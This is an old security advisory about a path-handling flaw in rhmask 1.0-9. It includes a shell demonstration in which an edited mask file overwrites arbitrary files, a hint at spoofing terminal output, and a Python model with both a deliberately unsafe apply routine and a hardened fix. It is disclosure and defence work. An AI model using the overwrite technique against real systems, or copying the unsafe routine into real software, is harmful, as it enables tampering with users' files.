
rhmask file overwrite
13th Jun 2002 [SBWID-5431]
COMMAND

	rhmask file overwrite

SYSTEMS AFFECTED

	rhmask 1.0-9

PROBLEM

	Andrew Griffiths [http://www.tasmail.com] found following:
	

	rhmask is intended to allow the distribution of files as  masks  against
	other files. This lets new versions of software  be  freely  distributed
	on public internet servers but limits  their  usefulness  to  those  who
	already have a copy of the package. It uses a simple XOR  scheme  for  creating
	the file mask and uses file size and md5 sums to  ensure  the  integrity
	of the result.
	

	

	 Problem

	 =======

	

	rhmask blindly trusts the output filename stored in the mask  given  to
	it. This allows, for example, /etc/passwd to be  overwritten  (or  created),
	subject to the privileges of the user running rhmask, of course.
	

	

	 Notes

	 =====

	

	Files are created with mode 0666 (subject to your umask).  If  a  person
	has a umask of 0, the files will be readable and writable by all. (duh)
	

	rhmask accepts input files of different sizes.
	

	

	 Demonstration

	 =============

	

	
	[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >old_file
	> this is the old version
	> _EOF_
	[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >new_file
	> this is the new version
	> _EOF_
	[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >victim
	> I'm a helpless victim file
	> _EOF_
	[andrewg@blackhole rhmask_test]$ rhmask -d old_file new_file
	replace_old_file.mask
	[andrewg@blackhole rhmask_test]$ rm -f new_file
	[andrewg@blackhole rhmask_test]$ rhmask old_file
	replace_old_file.mask
	generating new_file
	[andrewg@blackhole rhmask_test]$ cat new_file
	this is the new version
	[andrewg@blackhole rhmask_test]$ strings replace_old_file.mask
	7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2new_file
	[andrewg@blackhole rhmask_test]$ ht replace_old_file.mask
	
	[ ht is a binary editor for linux ]
	
	[andrewg@blackhole rhmask_test]$ strings replace_old_file.mask
	7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2victim
	[andrewg@blackhole rhmask_test]$ rhmask old_file
	replace_old_file.mask
	generating victim
	[andrewg@blackhole rhmask_test]$ cat victim
	this is the new version
	
	[ you killed kenny! ]
	
	[andrewg@blackhole rhmask_test]$ rhmask -d old_file new_file
	replace_old_file.mask
	[andrewg@blackhole rhmask_test]$ ht replace_old_file.mask
	[andrewg@blackhole rhmask_test]$ strings replace_old_file.mask
	7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2/tmp/ile
	[andrewg@blackhole rhmask_test]$ rm -f /tmp/ile
	[andrewg@blackhole rhmask_test]$ rhmask old_file
	replace_old_file.mask
	generating /tmp/ile
	[andrewg@blackhole rhmask_test]$ cat /tmp/ile
	this is the new version
	
	

	 Severity

	 ========

	

	Well, this part being the most subjective, I would say it's rather  low,
	as it tells you the file name as it does  it.  However,  since  it  also
	follows symlinks, you could probably make a /tmp symlink  with  terminal
	characters in it to overwrite the filename. Possibly along the lines  of
	a file of '/tmp/symlink^Mgenerating harmless', which should cause
	"generating harmless" to appear... however, when harmless doesn't appear
	or hasn't changed there will most likely be suspicion. file also has the
	same problem with terminal characters in the data it reads and outputs.
	

	

SOLUTION

	Firstly, have it ignore or complain about slashes in the filename.  Have
	it prompt you if the target filename is a symbolic link.
	

	[ In my opinion, sign the maskfile and make sure  you  check  the
	signature before using it. Oh, and don't obtain the maskfile + signature
	+ public key of the person from the same place. ]
	

	Besides, the author (Erik Troan,  ewt@redhat.com)  was  informed  about
	this a couple of months ago, and he told me this  was  a  non-issue  as
	Red Hat were moving to a different system.
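	The following is an added example, not code from the advisory or from
	rhmask itself. It models the scheme in Python with a constructed,
	simplified mask layout (two md5 hex digests, a NUL-terminated output
	name, then new XOR old) that is only assumed from the `strings` output
	in the demonstration, not the real rhmask file format. One apply routine
	uses the embedded name as-is, the way the PROBLEM section describes; the
	other enforces the checks suggested above (no slashes, no symlink
	following, plus rejection of control characters that could forge the
	"generating ..." line) and creates the file with a fixed 0600 mode. The
	function names are my own.

```python
import hashlib
import os
import tempfile

# Simplified mask layout, constructed for this example. It is NOT the real
# rhmask on-disk format, which the advisory only shows through `strings`:
#   32 hex chars: md5 of the old file   32 hex chars: md5 of the new file
#   NUL-terminated output filename      then: new XOR old (old zero-padded)
# The digests cover file contents only, so editing the name field in a hex
# editor (as the advisory does with `ht`) leaves every integrity check intact.

def _xor(data: bytes, key: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, key))

def _key(old: bytes, length: int) -> bytes:
    return (old + b"\0" * length)[:length]       # pad or truncate old file

def make_mask(old: bytes, new: bytes, out_name: str) -> bytes:
    header = hashlib.md5(old).hexdigest() + hashlib.md5(new).hexdigest()
    return header.encode() + out_name.encode() + b"\0" + _xor(new, _key(old, len(new)))

def reconstruct(old: bytes, mask: bytes):
    """Return (output name, new file bytes); raises if either md5 mismatches."""
    old_md5, new_md5 = mask[:32].decode(), mask[32:64].decode()
    end = mask.index(b"\0", 64)
    name, payload = mask[64:end].decode(errors="replace"), mask[end + 1:]
    if hashlib.md5(old).hexdigest() != old_md5:
        raise ValueError("old file does not match mask")
    new = _xor(payload, _key(old, len(payload)))
    if hashlib.md5(new).hexdigest() != new_md5:
        raise ValueError("reconstructed file fails md5 check")
    return name, new

def apply_mask_trusting(old: bytes, mask: bytes, cwd: str) -> str:
    """The behaviour the advisory describes: the name in the mask is used as-is."""
    name, new = reconstruct(old, mask)
    path = os.path.join(cwd, name)      # an absolute name discards cwd entirely
    with open(path, "wb") as f:         # follows symlinks, clobbers existing files
        f.write(new)
    return path

def safe_output_name(name: str) -> str:
    """Reject names that leave cwd or could spoof the 'generating ...' line."""
    if not name or name in (".", ".."):
        raise ValueError("empty or dot filename")
    if "/" in name or "\\" in name:
        raise ValueError("path separator in filename: %r" % name)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        raise ValueError("control character in filename: %r" % name)
    return name

def apply_mask_hardened(old: bytes, mask: bytes, cwd: str) -> str:
    name, new = reconstruct(old, mask)
    path = os.path.join(cwd, safe_output_name(name))
    # O_EXCL refuses an existing file or symlink (even a dangling one) instead
    # of prompting; 0o600 replaces the 0666-minus-umask default the advisory notes.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    with os.fdopen(os.open(path, flags, 0o600), "wb") as f:
        f.write(new)
    return path

def demo() -> dict:
    """Replay the advisory's scenarios in a scratch directory; every value is True."""
    old, new = b"this is the old version\n", b"this is the new version\n"
    r = {}
    with tempfile.TemporaryDirectory() as d:
        work = os.path.join(d, "work"); os.mkdir(work)
        victim = os.path.join(work, "victim")
        with open(victim, "wb") as f:
            f.write(b"I'm a helpless victim file\n")       # constructed input
        # 1. honest mask: the hardened version handles the normal case
        apply_mask_hardened(old, make_mask(old, new, "new_file"), work)
        with open(os.path.join(work, "new_file"), "rb") as f:
            r["honest_mask_works"] = f.read() == new
        # 2. name field edited to "victim": content checks still pass
        evil = make_mask(old, new, "victim")
        apply_mask_trusting(old, evil, work)
        with open(victim, "rb") as f:
            r["victim_clobbered"] = f.read() == new
        try:
            apply_mask_hardened(old, evil, work)
            r["hardened_refuses_existing"] = False
        except FileExistsError:
            r["hardened_refuses_existing"] = True
        # 3. absolute name escapes the working directory (the /tmp/ile case)
        target = os.path.join(d, "elsewhere")
        apply_mask_trusting(old, make_mask(old, new, target), work)
        r["absolute_name_escapes_cwd"] = os.path.isfile(target)
        # 4. hardened version rejects slashes and a CR that forges the status line
        r["hardened_rejects_bad_names"] = True
        for bad_name in (target, "x\rgenerating harmless"):
            try:
                apply_mask_hardened(old, make_mask(old, new, bad_name), work)
                r["hardened_rejects_bad_names"] = False
            except ValueError:
                pass
    return r

if __name__ == "__main__":
    print(demo())
```

	Refusing an existing target outright (O_EXCL) is stricter than the
	"prompt on symlink" suggested above, but it closes both the symlink case
	and the clobber case in one open() call, with no check-then-use window.
	Signing the mask, as suggested, is still needed to catch a tampered
	payload rather than just a tampered name.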
